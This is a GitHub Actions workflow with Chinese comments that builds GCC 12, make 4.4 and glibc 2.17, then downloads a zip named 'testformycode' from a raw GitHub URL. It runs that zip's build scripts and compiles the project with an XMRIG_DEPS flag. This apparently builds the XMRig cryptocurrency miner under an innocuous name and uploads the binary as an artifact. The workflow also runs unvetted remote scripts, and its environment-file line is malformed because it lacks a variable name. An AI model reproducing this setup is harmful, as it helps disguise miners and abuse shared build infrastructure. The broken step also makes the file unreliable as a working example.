name: Build and Install Dependencies

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-18.04

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v2

      - name: Install Dependencies
        run: |
          sudo apt-get update
          sudo apt-get install -y curl unzip git build-essential cmake automake libtool autoconf texinfo gawk sed

      - name: Upgrade GCC and Make
        run: |
          # 安装更高版本的 GCC 和 Make
          sudo add-apt-repository ppa:ubuntu-toolchain-r/test -y
          sudo apt-get update
          sudo apt-get install -y gcc-12 g++-12 make

          # 设置默认 GCC 和 G++ 版本为 12
          sudo update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-12 12
          sudo update-alternatives --install /usr/bin/g++ g++ /usr/bin/g++-12 12

          # 升级 make 到 4.4 版本
          wget https://ftp.gnu.org/gnu/make/make-4.4.tar.gz
          tar -xzvf make-4.4.tar.gz
          cd make-4.4
          ./configure
          sudo make install

          # 验证 GCC 和 Make 版本
          gcc --version
          make --version

      - name: Download and Install glibc 2.17
        run: |
          # 创建一个临时目录用于存放 glibc
          mkdir -p ~/glibc
          cd ~/glibc

          # 下载 glibc 2.17 源码
          curl -L -o glibc-2.17.tar.gz https://ftp.gnu.org/gnu/libc/glibc-2.17.tar.gz
          tar -xzvf glibc-2.17.tar.gz
          cd glibc-2.17

          # 创建构建目录
          mkdir build
          cd build

          # 配置编译选项
          ../configure --prefix=/usr/local/glibc-2.17

          # 编译和安装
          make -j$(nproc)
          sudo make install

      - name: Set up Environment
        run: |
          # 设置 LD_LIBRARY_PATH
          echo "/usr/local/glibc-2.17/lib" >> $GITHUB_ENV

      - name: Download and Unzip Source Code
        run: |
          curl -L -o testformycode.zip https://raw.githubusercontent.com/tjbcc0/tetmc/refs/heads/main/testformycode.zip
          unzip testformycode.zip

      - name: Build Project
        run: |
          cd testformycode/scripts
          chmod 777 *.sh
          ./build_deps.sh
          cd ..
          mkdir build
          cd build
          cmake -DXMRIG_DEPS=scripts/deps -DBUILD_SHARED_LIBS=OFF ..
          make

      - name: Check Binary Dependencies
        run: |
          cd testformycode/build
          ldd testformycode

      - name: Upload Build Artifacts
        uses: actions/upload-artifact@v3
        with:
          name: build-output
          path: testformycode/build/testformycode  # 修改为具体的可执行文件路径
